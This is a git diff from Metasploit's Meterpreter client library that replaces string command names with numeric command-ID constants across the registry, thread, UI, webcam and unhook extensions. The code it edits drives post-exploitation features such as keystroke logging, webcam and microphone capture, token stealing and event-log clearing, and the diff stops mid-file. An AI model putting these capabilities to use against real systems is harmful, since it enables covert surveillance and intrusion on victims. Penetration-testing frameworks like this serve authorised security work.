@@ -115,7 +115,7 @@ def Registry.open_remote_key(target_host, root_key)
   # Creates the supplied registry key or opens it if it already exists.
   #
   def Registry.create_key(root_key, base_key, perm = KEY_READ)
-    request = Packet.create_request('stdapi_registry_create_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY)
 
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
@@ -131,7 +131,7 @@ def Registry.create_key(root_key, base_key, perm = KEY_READ)
   # Deletes the supplied registry key.
   #
   def Registry.delete_key(root_key, base_key, recursive = true)
-    request = Packet.create_request('stdapi_registry_delete_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY)
     flags   = 0
 
     if (recursive)
@@ -153,7 +153,7 @@ def Registry.delete_key(root_key, base_key, recursive = true)
   # Closes the supplied registry key.
   #
   def Registry.close_key(hkey)
-    request = Packet.create_request('stdapi_registry_close_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY)
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
 
@@ -167,7 +167,7 @@ def Registry.close_key(hkey)
   #
   def Registry.enum_key(hkey)
     keys    = []
-    request = Packet.create_request('stdapi_registry_enum_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY)
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
 
@@ -182,7 +182,7 @@ def Registry.enum_key(hkey)
   end
 
   def Registry.enum_key_direct(root_key, base_key, perm = KEY_READ)
-    request = Packet.create_request('stdapi_registry_enum_key_direct')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT)
     keys    = []
 
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
@@ -209,7 +209,7 @@ def Registry.enum_key_direct(root_key, base_key, perm = KEY_READ)
   # Sets the registry value relative to the supplied hkey.
   #
   def Registry.set_value(hkey, name, type, data)
-    request = Packet.create_request('stdapi_registry_set_value')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE)
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
     request.add_tlv(TLV_TYPE_VALUE_NAME, name)
@@ -223,13 +223,13 @@ def Registry.set_value(hkey, name, type, data)
 
     request.add_tlv(TLV_TYPE_VALUE_DATA, data)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return true
   end
 
   def Registry.set_value_direct(root_key, base_key, name, type, data, perm = KEY_WRITE)
-    request = Packet.create_request('stdapi_registry_set_value_direct')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT)
 
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
@@ -245,7 +245,7 @@ def Registry.set_value_direct(root_key, base_key, name, type, data, perm = KEY_W
 
     request.add_tlv(TLV_TYPE_VALUE_DATA, data)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     true
   end
@@ -255,7 +255,7 @@ def Registry.set_value_direct(root_key, base_key, name, type, data, perm = KEY_W
   # initialized RegistryValue instance if a match is found.
   #
   def Registry.query_value_direct(root_key, base_key, name, perm = KEY_READ)
-    request = Packet.create_request('stdapi_registry_query_value_direct')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT)
 
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
@@ -278,7 +278,7 @@ def Registry.query_value_direct(root_key, base_key, name, perm = KEY_READ)
   end
 
   def Registry.query_value(hkey, name)
-    request = Packet.create_request('stdapi_registry_query_value')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE)
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
     request.add_tlv(TLV_TYPE_VALUE_NAME, name)
@@ -303,7 +303,7 @@ def Registry.query_value(hkey, name)
   # registry key.
   #
   def Registry.delete_value(hkey, name)
-    request = Packet.create_request('stdapi_registry_delete_value')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE)
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
     request.add_tlv(TLV_TYPE_VALUE_NAME, name)
@@ -319,7 +319,7 @@ def Registry.delete_value(hkey, name)
   # Queries the registry class name and returns a string
   #
   def Registry.query_class(hkey)
-    request = Packet.create_request('stdapi_registry_query_class')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS)
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
 
@@ -335,7 +335,7 @@ def Registry.query_class(hkey)
   # names.  An array of RegistryValue's is returned.
   #
   def Registry.enum_value(hkey)
-    request = Packet.create_request('stdapi_registry_enum_value')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE)
     values  = []
 
     request.add_tlv(TLV_TYPE_HKEY, hkey)
@@ -351,7 +351,7 @@ def Registry.enum_value(hkey)
   end
 
   def Registry.enum_value_direct(root_key, base_key, perm = KEY_READ)
-    request = Packet.create_request('stdapi_registry_enum_value_direct')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT)
     values  = []
 
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
index 4469a1e63328a..796cc04eb10eb 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
@@ -53,7 +53,7 @@ def self.finalize(client,handle)
   # Suspends the thread's execution.
   #
   def suspend
-    request = Packet.create_request('stdapi_sys_process_thread_suspend')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND)
 
     request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle)
 
@@ -66,7 +66,7 @@ def suspend
   # Resumes the thread's execution.
   #
   def resume
-    request = Packet.create_request('stdapi_sys_process_thread_resume')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME)
 
     request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle)
 
@@ -79,7 +79,7 @@ def resume
   # Terminates the thread's execution.
   #
   def terminate(code)
-    request = Packet.create_request('stdapi_sys_process_thread_terminate')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE)
 
     request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle)
     request.add_tlv(TLV_TYPE_EXIT_CODE, code)
@@ -99,7 +99,7 @@ def terminate(code)
   # Queries the register state of the thread.
   #
   def query_regs
-    request = Packet.create_request('stdapi_sys_process_thread_query_regs')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS)
     regs    = {}
 
     request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle)
@@ -118,7 +118,7 @@ def query_regs
   # in the form of a hash.
   #
   def set_regs(regs_hash)
-    request = Packet.create_request('stdapi_sys_process_thread_set_regs')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS)
 
     request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle)
 
@@ -161,7 +161,7 @@ def pretty_regs
   # Closes the thread handle.
   #
   def self.close(client, handle)
-    request = Packet.create_request('stdapi_sys_process_thread_close')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE)
     request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle)
     client.send_request(request, nil)
     handle = nil
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 14feacef4b0be..55c61b873beb8 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -6,6 +6,130 @@ module Meterpreter
 module Extensions
 module Stdapi
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_STDAPI = 1000
+
+# Associated command ids
+COMMAND_ID_STDAPI_FS_CHDIR                           = EXTENSION_ID_STDAPI + 1
+COMMAND_ID_STDAPI_FS_CHMOD                           = EXTENSION_ID_STDAPI + 2
+COMMAND_ID_STDAPI_FS_DELETE_DIR                      = EXTENSION_ID_STDAPI + 3
+COMMAND_ID_STDAPI_FS_DELETE_FILE                     = EXTENSION_ID_STDAPI + 4
+COMMAND_ID_STDAPI_FS_FILE_COPY                       = EXTENSION_ID_STDAPI + 5
+COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH                = EXTENSION_ID_STDAPI + 6
+COMMAND_ID_STDAPI_FS_FILE_MOVE                       = EXTENSION_ID_STDAPI + 7
+COMMAND_ID_STDAPI_FS_GETWD                           = EXTENSION_ID_STDAPI + 8
+COMMAND_ID_STDAPI_FS_LS                              = EXTENSION_ID_STDAPI + 9
+COMMAND_ID_STDAPI_FS_MD5                             = EXTENSION_ID_STDAPI + 10
+COMMAND_ID_STDAPI_FS_MKDIR                           = EXTENSION_ID_STDAPI + 11
+COMMAND_ID_STDAPI_FS_MOUNT_SHOW                      = EXTENSION_ID_STDAPI + 12
+COMMAND_ID_STDAPI_FS_SEARCH                          = EXTENSION_ID_STDAPI + 13
+COMMAND_ID_STDAPI_FS_SEPARATOR                       = EXTENSION_ID_STDAPI + 14
+COMMAND_ID_STDAPI_FS_SHA1                            = EXTENSION_ID_STDAPI + 15
+COMMAND_ID_STDAPI_FS_STAT                            = EXTENSION_ID_STDAPI + 16
+COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE               = EXTENSION_ID_STDAPI + 17
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE           = EXTENSION_ID_STDAPI + 18
+COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES          = EXTENSION_ID_STDAPI + 19
+COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT             = EXTENSION_ID_STDAPI + 20
+COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY               = EXTENSION_ID_STDAPI + 21
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES              = EXTENSION_ID_STDAPI + 22
+COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE            = EXTENSION_ID_STDAPI + 23
+COMMAND_ID_STDAPI_NET_RESOLVE_HOST                   = EXTENSION_ID_STDAPI + 24
+COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS                  = EXTENSION_ID_STDAPI + 25
+COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN            = EXTENSION_ID_STDAPI + 26
+COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN               = EXTENSION_ID_STDAPI + 27
+COMMAND_ID_STDAPI_RAILGUN_API                        = EXTENSION_ID_STDAPI + 28
+COMMAND_ID_STDAPI_RAILGUN_API_MULTI                  = EXTENSION_ID_STDAPI + 29
+COMMAND_ID_STDAPI_RAILGUN_MEMREAD                    = EXTENSION_ID_STDAPI + 30
+COMMAND_ID_STDAPI_RAILGUN_MEMWRITE                   = EXTENSION_ID_STDAPI + 31
+COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS          = EXTENSION_ID_STDAPI + 32
+COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY                 = EXTENSION_ID_STDAPI + 33
+COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY                = EXTENSION_ID_STDAPI + 34
+COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY                = EXTENSION_ID_STDAPI + 35
+COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE              = EXTENSION_ID_STDAPI + 36
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY                  = EXTENSION_ID_STDAPI + 37
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT           = EXTENSION_ID_STDAPI + 38
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE                = EXTENSION_ID_STDAPI + 39
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT         = EXTENSION_ID_STDAPI + 40
+COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY                  = EXTENSION_ID_STDAPI + 41
+COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY                  = EXTENSION_ID_STDAPI + 42
+COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY           = EXTENSION_ID_STDAPI + 43
+COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS               = EXTENSION_ID_STDAPI + 44
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE               = EXTENSION_ID_STDAPI + 45
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT        = EXTENSION_ID_STDAPI + 46
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE                 = EXTENSION_ID_STDAPI + 47
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT          = EXTENSION_ID_STDAPI + 48
+COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY                = EXTENSION_ID_STDAPI + 49
+COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST             = EXTENSION_ID_STDAPI + 50
+COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN              = EXTENSION_ID_STDAPI + 51
+COMMAND_ID_STDAPI_SYS_CONFIG_GETENV                  = EXTENSION_ID_STDAPI + 52
+COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS                = EXTENSION_ID_STDAPI + 53
+COMMAND_ID_STDAPI_SYS_CONFIG_GETSID                  = EXTENSION_ID_STDAPI + 54
+COMMAND_ID_STDAPI_SYS_CONFIG_GETUID                  = EXTENSION_ID_STDAPI + 55
+COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME               = EXTENSION_ID_STDAPI + 56
+COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF                = EXTENSION_ID_STDAPI + 57
+COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN             = EXTENSION_ID_STDAPI + 58
+COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO                 = EXTENSION_ID_STDAPI + 59
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR                 = EXTENSION_ID_STDAPI + 60
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE                 = EXTENSION_ID_STDAPI + 61
+COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS            = EXTENSION_ID_STDAPI + 62
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST                = EXTENSION_ID_STDAPI + 63
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN                  = EXTENSION_ID_STDAPI + 64
+COMMAND_ID_STDAPI_SYS_EVENTLOG_READ                  = EXTENSION_ID_STDAPI + 65
+COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS              = EXTENSION_ID_STDAPI + 66
+COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH                 = EXTENSION_ID_STDAPI + 67
+COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE                  = EXTENSION_ID_STDAPI + 68
+COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE                = EXTENSION_ID_STDAPI + 69
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO               = EXTENSION_ID_STDAPI + 70
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES          = EXTENSION_ID_STDAPI + 71
+COMMAND_ID_STDAPI_SYS_PROCESS_GETPID                 = EXTENSION_ID_STDAPI + 72
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES       = EXTENSION_ID_STDAPI + 73
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = EXTENSION_ID_STDAPI + 74
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD             = EXTENSION_ID_STDAPI + 75
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD           = EXTENSION_ID_STDAPI + 76
+COMMAND_ID_STDAPI_SYS_PROCESS_KILL                   = EXTENSION_ID_STDAPI + 77
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE        = EXTENSION_ID_STDAPI + 78
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE            = EXTENSION_ID_STDAPI + 79
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK            = EXTENSION_ID_STDAPI + 80
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT         = EXTENSION_ID_STDAPI + 81
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY           = EXTENSION_ID_STDAPI + 82
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ            = EXTENSION_ID_STDAPI + 83
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK          = EXTENSION_ID_STDAPI + 84
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE           = EXTENSION_ID_STDAPI + 85
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE           = EXTENSION_ID_STDAPI + 86
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE          = EXTENSION_ID_STDAPI + 87
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS     = EXTENSION_ID_STDAPI + 88
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN            = EXTENSION_ID_STDAPI + 89
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS      = EXTENSION_ID_STDAPI + 90
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME          = EXTENSION_ID_STDAPI + 91
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS        = EXTENSION_ID_STDAPI + 92
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND         = EXTENSION_ID_STDAPI + 93
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE       = EXTENSION_ID_STDAPI + 94
+COMMAND_ID_STDAPI_SYS_PROCESS_WAIT                   = EXTENSION_ID_STDAPI + 95
+COMMAND_ID_STDAPI_UI_DESKTOP_ENUM                    = EXTENSION_ID_STDAPI + 96
+COMMAND_ID_STDAPI_UI_DESKTOP_GET                     = EXTENSION_ID_STDAPI + 97
+COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT              = EXTENSION_ID_STDAPI + 98
+COMMAND_ID_STDAPI_UI_DESKTOP_SET                     = EXTENSION_ID_STDAPI + 99
+COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD                 = EXTENSION_ID_STDAPI + 100
+COMMAND_ID_STDAPI_UI_ENABLE_MOUSE                    = EXTENSION_ID_STDAPI + 101
+COMMAND_ID_STDAPI_UI_GET_IDLE_TIME                   = EXTENSION_ID_STDAPI + 102
+COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8                   = EXTENSION_ID_STDAPI + 103
+COMMAND_ID_STDAPI_UI_SEND_KEYEVENT                   = EXTENSION_ID_STDAPI + 104
+COMMAND_ID_STDAPI_UI_SEND_KEYS                       = EXTENSION_ID_STDAPI + 105
+COMMAND_ID_STDAPI_UI_SEND_MOUSE                      = EXTENSION_ID_STDAPI + 106
+COMMAND_ID_STDAPI_UI_START_KEYSCAN                   = EXTENSION_ID_STDAPI + 107
+COMMAND_ID_STDAPI_UI_STOP_KEYSCAN                    = EXTENSION_ID_STDAPI + 108
+COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP                  = EXTENSION_ID_STDAPI + 109
+COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD                = EXTENSION_ID_STDAPI + 110
+COMMAND_ID_STDAPI_WEBCAM_GET_FRAME                   = EXTENSION_ID_STDAPI + 111
+COMMAND_ID_STDAPI_WEBCAM_LIST                        = EXTENSION_ID_STDAPI + 112
+COMMAND_ID_STDAPI_WEBCAM_START                       = EXTENSION_ID_STDAPI + 113
+COMMAND_ID_STDAPI_WEBCAM_STOP                        = EXTENSION_ID_STDAPI + 114
+COMMAND_ID_STDAPI_AUDIO_MIC_START                    = EXTENSION_ID_STDAPI + 115
+COMMAND_ID_STDAPI_AUDIO_MIC_STOP                     = EXTENSION_ID_STDAPI + 116
+COMMAND_ID_STDAPI_AUDIO_MIC_LIST                     = EXTENSION_ID_STDAPI + 117
+
+
+
 ##
 #
 # General
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
index aa9a6ac4e2f51..18b355c0a345a 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -53,11 +53,11 @@ def disable_keyboard
   # Enable keyboard input on the remote machine.
   #
   def enable_keyboard(enable = true)
-    request = Packet.create_request('stdapi_ui_enable_keyboard')
+    request = Packet.create_request(COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD)
 
     request.add_tlv(TLV_TYPE_BOOL, enable)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return true
   end
@@ -73,11 +73,11 @@ def disable_mouse
   # Enable mouse input on the remote machine.
   #
   def enable_mouse(enable = true)
-    request = Packet.create_request('stdapi_ui_enable_mouse')
+    request = Packet.create_request(COMMAND_ID_STDAPI_UI_ENABLE_MOUSE)
 
     request.add_tlv(TLV_TYPE_BOOL, enable)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return true
   end
@@ -87,7 +87,7 @@ def enable_mouse(enable = true)
   # from user input.
   #
   def idle_time
-    request = Packet.create_request('stdapi_ui_get_idle_time')
+    request = Packet.create_request(COMMAND_ID_STDAPI_UI_GET_IDLE_TIME)
 
     response = client.send_request(request)
 
@@ -98,7 +98,7 @@ def idle_time
   # Enumerate desktops.
   #
   def enum_desktops
-    request  = Packet.create_request('stdapi_ui_desktop_enum')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_DESKTOP_ENUM)
     response = client.send_request(request)
     desktopz = []
     if( response.result == 0 )
@@ -117,7 +117,7 @@ def enum_desktops
   # Get the current desktop meterpreter is using.
   #
   def get_desktop
-    request  = Packet.create_request( 'stdapi_ui_desktop_get' )
+    request  = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_GET )
     response = client.send_request( request )
     desktop  = {}
     if( response.result == 0 )
@@ -136,7 +136,7 @@ def get_desktop
   # with screen/keyboard/mouse control).
   #
   def set_desktop( session=-1, station='WinSta0', name='Default', switch=false )
-    request  = Packet.create_request( 'stdapi_ui_desktop_set' )
+    request  = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_SET )
     request.add_tlv( TLV_TYPE_DESKTOP_SESSION, session )
     request.add_tlv( TLV_TYPE_DESKTOP_STATION, station )
     request.add_tlv( TLV_TYPE_DESKTOP_NAME, name )
@@ -152,7 +152,7 @@ def set_desktop( session=-1, station='WinSta0', name='Default', switch=false )
   # Grab a screenshot of the interactive desktop
   #
   def screenshot( quality=50 )
-    request = Packet.create_request( 'stdapi_ui_desktop_screenshot' )
+    request = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT )
     request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
 
     if client.platform == 'windows'
@@ -222,9 +222,9 @@ def screenshot( quality=50 )
   # Unlock or lock the desktop
   #
   def unlock_desktop(unlock=true)
-    request  = Packet.create_request('stdapi_ui_unlock_desktop')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP)
     request.add_tlv(TLV_TYPE_BOOL, unlock)
-    response = client.send_request(request)
+    client.send_request(request)
     return true
   end
 
@@ -232,9 +232,9 @@ def unlock_desktop(unlock=true)
   # Start the keyboard sniffer
   #
   def keyscan_start(trackwindow=false)
-    request  = Packet.create_request('stdapi_ui_start_keyscan')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_START_KEYSCAN)
     request.add_tlv( TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW, trackwindow )
-    response = client.send_request(request)
+    client.send_request(request)
     return true
   end
 
@@ -242,8 +242,8 @@ def keyscan_start(trackwindow=false)
   # Stop the keyboard sniffer
   #
   def keyscan_stop
-    request  = Packet.create_request('stdapi_ui_stop_keyscan')
-    response = client.send_request(request)
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_STOP_KEYSCAN)
+    client.send_request(request)
     return true
   end
 
@@ -251,7 +251,7 @@ def keyscan_stop
   # Dump the keystroke buffer
   #
   def keyscan_dump
-    request  = Packet.create_request('stdapi_ui_get_keys_utf8')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8)
     response = client.send_request(request)
     return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
   end
@@ -260,9 +260,9 @@ def keyscan_dump
   # Send keystrokes
   #
   def keyboard_send(keys)
-    request  = Packet.create_request('stdapi_ui_send_keys')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_SEND_KEYS)
     request.add_tlv( TLV_TYPE_KEYS_SEND, keys )
-    response = client.send_request(request)
+    client.send_request(request)
     return true
   end
 
@@ -271,9 +271,9 @@ def keyboard_send(keys)
   #
   def keyevent_send(key_code, action = 0)
     key_data = [ action, key_code ].pack("VV")
-    request = Packet.create_request('stdapi_ui_send_keyevent')
+    request = Packet.create_request(COMMAND_ID_STDAPI_UI_SEND_KEYEVENT)
     request.add_tlv( TLV_TYPE_KEYEVENT_SEND, key_data )
-    response = client.send_request(request)
+    client.send_request(request)
     return true
   end
 
@@ -281,7 +281,7 @@ def keyevent_send(key_code, action = 0)
   # Mouse input
   #
   def mouse(mouseaction, x=-1, y=-1)
-    request  = Packet.create_request('stdapi_ui_send_mouse')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_UI_SEND_MOUSE)
     action = 0
     case mouseaction
     when "move"
@@ -306,7 +306,7 @@ def mouse(mouseaction, x=-1, y=-1)
     request.add_tlv( TLV_TYPE_MOUSE_ACTION, action )
     request.add_tlv( TLV_TYPE_MOUSE_X, x.to_i )
     request.add_tlv( TLV_TYPE_MOUSE_Y, y.to_i )
-    response = client.send_request(request)
+    client.send_request(request)
     return true
   end
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
index 2797efba518fc..601c2f11dad86 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -26,7 +26,7 @@ def session
   end
 
   def webcam_list
-    response = client.send_request(Packet.create_request('stdapi_webcam_list'))
+    response = client.send_request(Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_LIST))
     names = []
     response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
       names << tlv.value
@@ -36,21 +36,21 @@ def webcam_list
 
   # Starts recording video from video source of index +cam+
   def webcam_start(cam)
-    request = Packet.create_request('stdapi_webcam_start')
+    request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_START)
     request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)
     client.send_request(request)
     true
   end
 
   def webcam_get_frame(quality)
-    request = Packet.create_request('stdapi_webcam_get_frame')
+    request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_GET_FRAME)
     request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
   end
 
   def webcam_stop
-    client.send_request(Packet.create_request('stdapi_webcam_stop'))
+    client.send_request(Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_STOP))
     true
   end
 
@@ -77,7 +77,7 @@ def webcam_chat(server)
   # Record from default audio source for +duration+ seconds;
   # returns a low-quality wav file
   def record_mic(duration)
-    request = Packet.create_request('stdapi_webcam_audio_record')
+    request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD)
     request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_AUDIO_DATA).value
diff --git a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
index 88eee2c18aca5..13fb1ddf0c17c 100644
--- a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
@@ -4,7 +4,15 @@ module Post
 module Meterpreter
 module Extensions
 module Unhook
-  TLV_TYPE_UNHOOK_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_UNHOOK = 10000
+
+# Associated command ids
+COMMAND_ID_UNHOOK_PE = EXTENSION_ID_UNHOOK + 1
+
+TLV_TYPE_UNHOOK_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
index e42104e6c6518..7426a1a93cf8d 100644
--- a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
+++ b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
@@ -17,6 +17,10 @@ module Unhook
 class Unhook < Extension
